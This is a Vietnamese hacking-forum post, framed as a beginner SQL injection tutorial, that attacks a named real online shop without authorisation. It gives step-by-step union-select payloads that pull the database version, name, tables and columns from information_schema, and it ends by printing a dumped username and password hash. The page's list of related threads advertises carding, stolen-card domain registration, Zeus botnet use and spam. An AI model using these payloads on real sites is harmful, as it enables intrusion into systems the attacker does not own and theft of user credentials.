• Downloading from our site will require you to have a paid membership. Upgrade to a Premium Membership from 10$ a month today!

    Dont forget read our Rules! Also anyone caught Sharing this content will be banned. By using this site you are agreeing to our rules so read them. Saying I did not know is simply not an excuse! You have been warned.

[TUT] Hướng dẫn lỗi sql injection cơ bản

Admin

Admin

Well-Known Member
Staff member
Administrator
Victim : SHOP DINOKID ->> link còn nóng để thực hành bài Lab nhé ^^!giờ xem lỗi của nó nhé ^^! thêm dấu ( ' ) đằng sau =331 để xem nó có lỗi gì ko nhé ^^!tiếp theo nào ^^! bắt đầu tìm số column lỗi bằng order byorder by 1 ->> mở màn coi không có lỗi...order by 14 ->> vẫn thế :(thôi thì ta thử union select để xem lỗi cột chúng ta thử từ 0 -> tới cột 11 xem trong đó có lòi ra lỗi không nhé-331 union select 0,1,2,3,4,5,6,7,8,9,10,11ạc cái gì đây trời :(Phat hien co su tan cong!Viec tan cong nay da bi ngan chan va se duoc ghi nhan lai:***.81.**.*** - Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1mịa nóa kiểu này viết tut xong là tớ từ biệt anh em :(( thôi cữ tiếp tục :x mặc kệ luôn :))hình như ta union select sai ở đâu đó :( thử bỏ số 0 đi xem-331 union select 1,2,3,4,5,6,7,8,9,10,11ạc thử thêm 12,13,14 xem :(-311 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14chà lòi ra column lỗi ở số 3 roài :x tiếp tục nàoget info, version, database, users ở số 3 xem, ta xem version của nó nhé.-311 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14=> 5.0.92-communityra rùi get thử database nhé-331 union select 1,2,database(),4,5,6,7,8,9,10,11,12,13,14=> shopdino_shopdbgiờ ta get table_name của nó nhé-331 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14 from information_schema.tables-- -hiện số 3 là okta thử với câu lệnh :-331 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14 from information_schema.tables where table_schema like database()-- -lại được số 3ta thay số 3 = table_name nhé-311 union select 1,2,table_name,4,5,6,7,8,9,10,11,12,13,14 from information_schema.tables where table_schema like database()-- -sạc lỗi, khó hiểu nhỉ :-/ta thử dùng lệnh unhex(hex()) xem sao-331 union select 1,2,unhex(hex(table_name)),4,5,6,7,8,9,10,11,12,13 ,14 from information_schema.tables where table_schema like database()-- -ta đc => tbl_access-311 union select 1,2,unhex(hex(group_concat(column_name))),4,5,6,7, 8,9,10,11,12,13,14 from information_schema.columns where table_schema like database() and table_name like 'tbl_user'-- -=> id,uid,pwd ok lấy user/pass nào-331 union select 1,2,unhex(hex(group_concat(uid,0x7c,pwd))),4,5,6,7 ,8,9,10,11,12,13,14 from tbl_user-- -=> bephuong|c6df310058c108b9898d9a612c13ce8a hết Tut -> Chúc các bạn thành công
 
You must log in or register to reply here.

Facebook Comments

Similar threads
Thread starter Title Forum Replies Date
Myshare Share Tut hướng dẫn add site(tên miền) lên google Hosting / Domain 0
B [tut] hướng dẫn dowload link mediafire bằng Uc browser S40 0
T xin tut hướng dẫn cài đặt vBSEO hay friend url chi tiết Vbulletin 5
Hailan TUT Hướng dẫn mod Dual Screen trên mobile Thủ thuật ĐTDĐ 1
Admin TUT hướng dẫn anh em mod full avatar Crack, hack, mod, ghép game, ứng dụng 3
Admin Tut hướng dẫn chiếm quyền admin vbb trong data Hacking 4
Admin Share tut hướng dẫn sử dụng google part 1 Thảo luận wap việt 0
Admin TUT hướng dẫn tạo diễn đàn cơ bản trên wapka.mobi Wap builder, wapego, xtgem, wen.ru, wapka, wap4 17
C [TUT] Hướng dẫn làm 4rum phpbb full hình ảnh By Wap-Mobile.Net Kiến thức lập trình 2
L [TUT] Hướng dẫn làm johncms trên 000webhost Johncms 27
Admin [Hướng Dẫn] TUT leech bài từ các báo điện tử về forum vbb Vbulletin 6
Admin [TUT] Hướng dẫn leech file lên host nhanh chóng Thảo luận wap việt 12
Admin [Share] Tut hướng dẫn dùng sock fake ip Kiến thức lập trình 4
Admin [TUT] Hướng dẫn làm forum phpbb trên S40 dễ dàng. Phpbb3x 40
Q Cần mua tut reg domain bằng CCN Hỏi đáp về domain & hosting 2
Admin Share tut bắn reach ads Facebook mới nhất dùng thẻ cứng Tut, tool, mmo 2
Admin Share tut ân hạn Facebook mới nhất 2020 Tut, tool, mmo 2
Admin Tut kháng Ad Breaks bị tắt kiếm tiền thành công Tut, tool, mmo 0
Admin Share một số tut chiến Facebook Ad Breaks theo kinh nghiệm Tut, tool, mmo 0
S [Tut]Basic Hacking - Hacking cơ bản Exploit 0
Smobi Share [Tut] Làm một vật trở nên trong suốt bằng PTS Thiết kế đồ họa 0
KhangSkull [TUT] Khai thác SQLi dạng .html SQL injection 0
Admin Tut reseller domain không die Tut, tool, mmo 1
Admin Share video tut reg domain quốc tế free bằng ccv thực vật Tut, tool, mmo 0
Hero Share TUT Local Full 2012 Tut, tool, mmo 6
Admin [Tut] hack bạn gái cho it Thơ, báo, tạp chí 2
H Tut Hack Card Viettel Số Lượng Ko Giới Hạn Trò chuyện linh tinh 14
Admin Share Tut Spam Facebook Tut, tool, mmo 0
blog4me Share Tổng hợp một số TUT chơi CC Security - Local - Hacking 2
S TUT Vps Free 1 Tháng VPS & Dedicated Server 1
Admin Share tut reg domain .vn 2013 - nhanh không nát Tut, tool, mmo 3
Hero [TUT] Reg Domain, VPS, Hosting Đủ Loại Security - Local - Hacking 11
Admin Share tut đâm domain .my free 1-5 year Tut, tool, mmo 2
Admin Share Tut Hosting Pháp Disk 512mb Bw Unlimited Tut, tool, mmo 0
Admin Share tut reg domain bằng ccv, ccn 1-10 years Tut, tool, mmo 2
Admin Share tut ship giầy nhầm nước Tut, tool, mmo 5
V Hướng dẫn [TUT] Gửi email từ localhost bằng Mercury Mail VPS & Dedicated Server 0
V Share [Cash Out] Tut site cash PP&CC về PPVN đang được thịnh hành Hacking 0
V Share [Tut] Fake Ip từ A đến Z Hacking 0
V Share [Tut] Hack site lỗi SQLi với Havij + Up shell - Guan™ Hacking 0
V Share [TUT] sữ dụng Botnet ZEUS chi tiết Hacking 0
K Xin anh em co tut an gift Hacking 0
S [tut] domain .*** free = ccn Hosting & Domain Free 0
J Share [Tut] Fake Ip từ A đến Z Security - Local - Hacking 0
S Share [Shipping Tut] Key KIS 2012, KIS 2013, NIS 2012, MS.... Hacking 1
Admin [Tut] domain yahoo 5 năm Tut, tool, mmo 15
X Share [TUT] Đăng kí domain .me 1 năm miễn phí Hosting & Domain Free 14
Admin Share tut ship nước hoa bằng ccv Tut, tool, mmo 7
Admin [Tut] sql dạng html Tut, tool, mmo 2
V [TUT] VPS Win/Linux UK VPS & Dedicated Server 6

Similar threads

New posts New threads New resources

Back
Top